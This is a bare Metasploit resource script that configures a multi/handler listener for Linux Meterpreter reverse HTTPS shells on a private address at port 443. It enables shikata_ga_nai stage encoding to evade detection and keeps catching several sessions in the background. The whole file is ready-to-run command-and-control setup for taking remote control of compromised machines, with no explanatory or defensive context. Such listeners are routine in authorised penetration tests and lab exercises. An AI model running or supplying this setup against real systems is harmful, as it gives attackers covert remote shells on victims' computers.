use exploit/multi/handler
set PAYLOAD linux/meterpreter/reverse_https
set LHOST 192.168.119.129
set LPORT 443
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
set ExitOnSession false
exploit -j -z
